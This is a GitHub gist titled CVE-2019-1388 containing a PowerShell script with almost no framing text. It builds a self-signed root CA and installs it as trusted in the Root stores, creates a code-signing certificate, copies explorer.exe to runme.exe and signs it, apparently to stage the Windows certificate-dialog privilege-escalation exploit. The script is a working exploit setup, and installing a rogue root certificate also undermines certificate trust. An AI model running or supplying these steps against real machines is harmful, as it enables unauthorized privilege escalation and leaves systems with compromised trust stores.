Created
November 25, 2019 22:08
-
-
Save pwndad/ecb8a9864b00c6d3c8a1ebb7c5f2bc12 to your computer and use it in GitHub Desktop.
CVE-2019-1388
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# jump to a location with write permissions | |
cd $env:USERPROFILE\desktop | |
# add win sdk dir to path variable | |
$env:Path="$env:Path;C:\Program Files (x86)\Windows Kits\10\bin\10.0.18362.0\x64\" | |
# create root ca cert | |
makecert -n "CN=root ca" -a sha1 -eku 1.3.6.1.5.5.7.3.3 -r -sv root.pvk root.cer -ss Root -sr localMachine -l https://www.zerodayinitiative.com/blog/ | |
# create code signer cert | |
makecert -pe -n "CN=code signer" -ss MY -a sha1 -eku 1.3.6.1.5.5.7.3.3 -iv root.pvk -ic root.cer -sv codeSigner.pvk codeSigner.cer | |
# convert private key material to pfx container | |
pvk2pfx -pvk codeSigner.pvk -spc codeSigner.cer -pfx codeSigner.pfx | |
# import code signer cert | |
$codeSigner = Import-PfxCertificate -Exportable -CertStoreLocation Cert:\CurrentUser\My\ -FilePath .\codeSigner.pfx | |
# import root ca cert | |
Import-Certificate -FilePath .\root.cer -CertStoreLocation Cert:\CurrentUser\Root\ | |
# copy arbitrary binary (gets modified during sign process) | |
cp C:\windows\explorer.exe .\runme.exe | |
# sign binary | |
Set-AuthenticodeSignature -FilePath .\runme.exe -Certificate $codeSigner -IncludeChain "all" -TimestampServer http://timestamp.digicert.com -Force |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment